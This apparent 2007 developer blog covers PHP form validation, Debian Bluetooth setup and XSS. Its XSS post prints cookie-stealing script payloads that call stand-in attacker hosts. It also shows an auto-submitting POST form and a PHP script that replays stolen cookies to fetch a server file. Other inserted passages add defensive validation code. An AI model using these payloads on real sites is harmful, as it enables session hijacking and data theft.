For web development I think you should go with a fixed price for the time period. Once you get the time estimate from the project manager, make sure your developers/designers don't take more time than expected to finish a job, because this field is so competitive that you have to deliver projects on time to keep up in the business. A good process should be defined to gather client requirements and the project spec, and you have to make sure not to accept any change requests from the customer till you finish the first release.
At the same time you have to make sure that you have a sound Quality Assurance process, so that the deliverables match the client requirements exactly.
Thursday, August 09, 2007
Thursday, June 14, 2007
filter.php
This is my newest solution for form submit data validation. It was developed from a "developer point of view" rather than an "end user point of view", so if you don't have any idea about PHP development you'll find it a bit difficult to understand. But once you get to know the pattern you'll love it, and of course you'll be using it to validate all your form submissions.
First we'll see what types of things we have to validate as HTML form elements.
- textfield
- textarea
- checkbox
- radio button
- radio group
- List / Menu
- file field
One other cool feature of this script is that you can keep the default values of the other elements even when one element fails to validate. It may sound like a very common and easy task on JavaScript-enabled pages, but remember this snippet will validate and keep the default values nicely without any JavaScript at all.
Does that sound interesting?
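The post does not include filter.php itself, so here is an added example (my own, not the author's script) of the same idea: server-side validation of the element types listed above, re-rendering the form with the submitted values kept when any field fails, with no JavaScript involved. The field names, rules and option lists are assumed for illustration, the mbstring extension is assumed to be loaded, and the file field is left out because it needs separate $_FILES handling.

```php
<?php
// Added example (not the author's filter.php): validate the listed element
// types on the server and re-render the form with the submitted values kept
// when one field fails. Field names, rules and options are assumed.

$fields = [
    'name'    => ['type' => 'text',     'required' => true,  'max' => 50,
                  'pattern' => '/^[\p{L} .\'-]+$/u'],
    'comment' => ['type' => 'textarea', 'required' => false, 'max' => 500],
    'agree'   => ['type' => 'checkbox', 'required' => true],
    'colour'  => ['type' => 'radio',    'required' => true,  'options' => ['red', 'green', 'blue']],
    'country' => ['type' => 'select',   'required' => true,  'options' => ['LK', 'IN', 'GB']],
];

// Every value echoed back into the form goes through this, so a sticky value
// such as "><script>... cannot break out of its attribute (reflected XSS).
function h($s) {
    return htmlspecialchars((string) $s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Validate $input (normally $_POST) against $fields. Returns [clean, errors];
// clean holds only the values that passed, so later storage never sees raw input.
function validateForm(array $fields, array $input) {
    $clean = []; $errors = [];
    foreach ($fields as $name => $rule) {
        $raw = isset($input[$name]) ? $input[$name] : null;
        switch ($rule['type']) {
            case 'checkbox':
                // An unticked box is simply absent from the request.
                $clean[$name] = ($raw !== null);
                if ($rule['required'] && !$clean[$name]) $errors[$name] = 'must be ticked';
                break;
            case 'radio':
            case 'select':
                // Never trust the browser's list: accept only our own options.
                if ($raw === null || $raw === '') {
                    if ($rule['required']) $errors[$name] = 'is required';
                } elseif (!is_string($raw) || !in_array($raw, $rule['options'], true)) {
                    $errors[$name] = 'is not a valid choice';
                } else {
                    $clean[$name] = $raw;
                }
                break;
            default: // text and textarea
                $val = is_string($raw) ? trim($raw) : '';
                if ($val === '') {
                    if ($rule['required']) $errors[$name] = 'is required';
                } elseif (mb_strlen($val, 'UTF-8') > $rule['max']) {
                    $errors[$name] = 'is too long';
                } elseif (isset($rule['pattern']) && !preg_match($rule['pattern'], $val)) {
                    $errors[$name] = 'contains characters that are not allowed';
                } else {
                    $clean[$name] = $val;
                }
        }
    }
    return [$clean, $errors];
}

// Render the form; whatever the user already typed or chose stays selected.
function renderForm(array $fields, array $input, array $errors) {
    $out = "<form method=\"post\" action=\"\">\n";
    foreach ($fields as $name => $rule) {
        $raw = (isset($input[$name]) && is_string($input[$name])) ? $input[$name] : '';
        $err = isset($errors[$name]) ? ' <em>' . h($errors[$name]) . '</em>' : '';
        $out .= '<label>' . h($name) . ' ';
        switch ($rule['type']) {
            case 'textarea':
                $out .= '<textarea name="' . h($name) . '">' . h($raw) . '</textarea>';
                break;
            case 'checkbox':
                $out .= '<input type="checkbox" name="' . h($name) . '" value="1"'
                      . (isset($input[$name]) ? ' checked' : '') . '>';
                break;
            case 'radio':
                foreach ($rule['options'] as $opt) {
                    $out .= '<input type="radio" name="' . h($name) . '" value="' . h($opt) . '"'
                          . ($raw === $opt ? ' checked' : '') . '>' . h($opt) . ' ';
                }
                break;
            case 'select':
                $out .= '<select name="' . h($name) . '">';
                foreach ($rule['options'] as $opt) {
                    $out .= '<option value="' . h($opt) . '"' . ($raw === $opt ? ' selected' : '')
                          . '>' . h($opt) . '</option>';
                }
                $out .= '</select>';
                break;
            default:
                $out .= '<input type="text" name="' . h($name) . '" value="' . h($raw) . '">';
        }
        $out .= $err . "</label><br>\n";
    }
    return $out . "<input type=\"submit\"></form>\n";
}

// On a POST, validate; if anything failed, show the form again with values kept.
if (isset($_SERVER['REQUEST_METHOD']) && $_SERVER['REQUEST_METHOD'] === 'POST') {
    list($clean, $errors) = validateForm($fields, $_POST);
    echo $errors ? renderForm($fields, $_POST, $errors) : 'Saved: ' . h(json_encode($clean));
} else {
    echo renderForm($fields, [], []);
}
```

The two halves are deliberately separate: validateForm decides what is acceptable and hands back only clean values, while renderForm re-displays the raw submission so nothing the user typed is lost; because every echoed value passes through h(), a failed submission containing markup is shown as text rather than executed.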
Labels: filter.php, input, PHP, validation, web security
Monday, June 11, 2007
The Big Day Coming ahead on friday
Yes, it will be a big day for me because on Friday I have to conduct my first technical session for all my colleagues at accura-tech. Even though they have given me the title of software engineer, I'm currently educating all the other developers about new technologies.
So by Friday evening I should prepare myself to conduct this technical session on user input validation. Hopefully this will be the first in a row of sessions on web security, which is one of my favourite topics.
I have already designed and checked the validation code which I will be using to demonstrate the impact.
I'll update this blog with a photo (if available) and the necessary files once I'm done with this.
And I know that surely there will be a lot of ideas coming in from our developers too, so I'll try to post them back to the blog.
--
Praveen Gunasekara
Wednesday, May 30, 2007
vote for drupal
Drupal has been selected as a finalist by the editors at CNet Webware in the first ever “Webware 100” Awards, from over 4,000 user-submitted nominations. Winners will be announced on Monday, June 18 and posted on Webware.com.
Voting is NOW OPEN, and will remain so until June 11. So please, vote for Drupal!
Monday, May 14, 2007
installing bluetooth manager on my debian laptop
I just wanted to install some kind of Bluetooth connection manager on my laptop, because I had some files to be transferred from my mobile to the laptop. My laptop is a Compaq Presario M2000 and I'm using Debian (my favourite OS) on it.
First I installed the bluez-utils package.
apt-get install bluez-utils
Then I connected the Bluetooth dongle and ran hciconfig.
hci0: Type: USB
BD Address: 00:11:67:1D:ED:DC ACL MTU: 678:8 SCO MTU: 48:10
UP RUNNING PSCAN
RX bytes:4816991 acl:18400 sco:0 events:7524 errors:0
TX bytes:657600 acl:7361 sco:0 commands:71 errors:0
So from the previous result I knew that the dongle is recognized, and then I wanted to scan for new devices. Then I turned on Bluetooth on my mobile phone (Sony Ericsson K750i).
Then I executed hcitool scan and it gave me the following result.
praveen-laptop:/home/praveen/Desktop/Downloads# hcitool scan
Scanning ...
00:18:13:4F:4A:61 Praveen K750i
00:03:7A:E0:9B:EE CHANDIKA
00:17:4B:D4:29:56 Chandika Nokia 6630
Now it seems that I can connect to the phone. So I wanted to know some more information about my mobile, so I ran hcitool information 00:18:13:4F:4A:61 and it gave me the following result.
Requesting information ...
BD Address: 00:18:13:4F:4A:61
Device Name: Praveen K750i
LMP Version: 1.2 (0x2) LMP Subversion: 0x41c
Manufacturer: Philips Semiconductors (37)
Features: 0xff 0xed 0x8d 0xf8 0x1a 0x08 0x00 0x00
<3-slot> <5-slot> ....
Then I installed the gnome-bluetooth Debian package. I selected tuxfamily.org to download it from, so I had to update the sources.list, which resides at /etc/apt/sources.list.
deb http://download.tuxfamily.org/osrdebian unstable gnome-bluetooth
deb-src http://download.tuxfamily.org/osrdebian unstable gnome-bluetooth
I added these two lines. Then I tried to update apt, but it seems that you need a public key to access the newly added sources.
So then I ran
wget http://download.tuxfamily.org/osrdebian/61B8DB62.gpg -O- | sudo apt-key add -
to add the key to the apt trusted key list.
The hard work is over, it seems. Then I ran apt-get install gnome-bluetooth in order to install gnome-bluetooth.
When the install completed there was a new button appearing under Applications -> Accessories -> Bluetooth File Sharing.
When I clicked on it, the service got started, and then I tried to send an image file to the laptop from my mobile and it worked.
Wooow, at last.
But to send files from my laptop to the mobile I still have to use the command gnome-obex-send, which opens a new window asking which device I want to send the file to.
That's well done.
I'm catching up and living with Linux.
Monday, April 23, 2007
XSS Attack
Cross-site scripting (XSS) is a relatively common problem in web application security, but these attacks are extremely dangerous. Rather than attacking the server directly, they use a vulnerable web page to attack one of its users. This can make tracking attackers extremely difficult when requests are not fully logged. Let's go deeper and find out how a vulnerable web page leads to an XSS attack, and how to make sure that there is no room left for XSS attacks in the web sites we develop.
So how does an XSS attack work? XSS attacks are the result of flaws in server-side web applications (that's what we write...) and are rooted in user input which is not properly validated. For example, think about a PHP page named hello.php which echoes a parameter sent to that file.
If you simply pass
hello.php?name=Praveen Gunasekara
Then the page will give you the expected result of printing the name. But guess what happens if we send HTML tags in that request. For example:
hello.php?name=<ul><li>Praveen</li><li>Gunasekara</li></ul>
The input is not validated by the script before being rendered by the victim's web browser. And think about situations where we save the unvalidated parameters into a database or a binary file and retrieve them later to render on the page.
For the moment you might be wondering: so what is the risk involved? If the attacker can pass HTML tags, it means he can easily pass <script> tags. So let's discuss how the attack works. As we all know, we only submit data by either the GET or the POST method. Attacking through the GET method is the easiest and at the same time the noisiest, because almost every web server logs all its URI requests.
So the simplest thing an attacker can do with JavaScript is to change the location of the window.
hello.php?name=<script>document.location.replace('http://attack/spam')</script>
But by the nature of XSS attacks the attacker himself cannot do any harm to other users directly. What he can do is wait till someone else connects to that page. So when someone else clicks on this page he will be automatically redirected to some other page.
And now think about hijacking the user's whole session with this kind of attack. It's not as hard as it sounds. What the attacker has to do is just change the href of a particular link.
hello.php?name=<script>document.location.replace('http://attack/spam?c='%2Bdocument.cookie)</script>
So now you might say that the POST method is far safer because the end user cannot see the parameters we are passing to the script.
You are wrong. It is a bit harder to attack the POST method, because to do that you need an intermediate web page having those parameters, identical to the form on the original page. For example,
<form name=f method=POST action="http://host/hello.php">
<input type=hidden name="name" value="<script>document.location.replace('http://attacker/payload?c='+document.cookie)</script>">
</form>
<script>f.submit()</script>
And rather than just redirecting, he might decide to change the look and feel and layout of the web page that's being attacked. But once he redirects the page to his own page there are several harmful things that can be done. For example, the following code can log the visitor's IP, referrer and the sensitive information saved in the headers.
And once the attacker has the list of IPs and cookies, he can write an automated script to connect to the IP with those session details and change the sensitive information there. The code below shows how to download the source code of a PHP file from the server.
<?php
// Build a raw HTTP/1.0 request that replays the cookie value received in ?c=
$request = "GET /secret.php HTTP/1.0\r\n";
$request .= "Cookie: {$_GET['c']}\r\n"; // $HTTP_GET_VARS was removed in PHP 5.4
$request .= "\r\n";
$s = fsockopen("host", 80, $errno, $errstr, 30); // "host" stands for the attacked site
if ($s === false)
{
die("connect failed: $errstr ($errno)");
}
fputs($s, $request);
$content = '';
while (!feof($s))
{
$content .= fgets($s, 4096);
}
fclose($s);
echo $content;
?>
And the following example code shows how to overwrite a PHP file on the server.
So finally I hope every one of us understood how dangerous XSS attacks can be, and that we should write our web applications with much more attention to security.
Praveen Gunasekara.
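The post shows the vulnerable hello.php only by its URL, so here is an added example (my own, not code from the post) of that page in its vulnerable form next to a hardened one, plus the two server-side settings that blunt the cookie theft described above: the HttpOnly flag on the session cookie and a Content-Security-Policy header. Function names are assumed, mbstring is assumed to be loaded, and the array form of session_set_cookie_params needs PHP 7.3 or later.

```php
<?php
// Added example, not code from the original post. hello.php as described in
// the post, first vulnerable and then hardened. Function names are assumed.

// VULNERABLE: the parameter is echoed straight into the page, so a
// ?name=<script>...</script> request is executed by every visitor's browser.
function helloVulnerable(array $get) {
    $name = isset($get['name']) ? $get['name'] : '';
    return "<p>Hello $name</p>";
}

// HARDENED:
//  1. validate the input against what a name may contain (allow-list);
//  2. encode on output, so even a value that passed validation, or that
//     comes back from the database later, can never become markup.
function helloSafe(array $get) {
    $name = (isset($get['name']) && is_string($get['name'])) ? trim($get['name']) : '';
    if ($name === '' || mb_strlen($name, 'UTF-8') > 50 || !preg_match('/^[\p{L} .\'-]+$/u', $name)) {
        $name = 'guest'; // reject bad input; do not try to "clean" it
    }
    return '<p>Hello ' . htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</p>';
}

// Blunts the document.cookie theft shown in the post: a session cookie marked
// HttpOnly is invisible to script, and Secure keeps it off plain HTTP.
function startHardenedSession() {
    session_set_cookie_params([
        'lifetime' => 0, 'path' => '/', 'secure' => true,
        'httponly' => true, 'samesite' => 'Lax',
    ]);
    session_start();
}

// Second layer: forbid inline script entirely, so an injected <script> block
// is refused by the browser even if some output path forgets to encode.
function sendCspHeader() {
    header("Content-Security-Policy: default-src 'self'; script-src 'self'");
}

// Constructed input: the cookie-stealing payload from the post.
$payload = ['name' => "<script>document.location.replace('http://attack/spam?c='+document.cookie)</script>"];

if (PHP_SAPI === 'cli') {
    // helloVulnerable() returns the script tag intact; helloSafe() returns "<p>Hello guest</p>".
    echo helloVulnerable($payload), "\n", helloSafe($payload), "\n";
} else {
    sendCspHeader();
    startHardenedSession();
    echo helloSafe($_GET);
}
```

Run it from the command line to compare the two outputs side by side; served from a web server, only the hardened path is used. The order of the three defences matters less than having all of them: validation limits what gets in, output encoding stops anything that does get in from being interpreted, and the cookie flags and CSP limit what an attacker gains if both of the first two are missed somewhere else in the application.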
My technorati profile
So today I've signed up for a new account at Technorati. This is the link to my profile page.
My Technorati Profile
Let's see how this is going to help me out.
~Praveen Gunasekara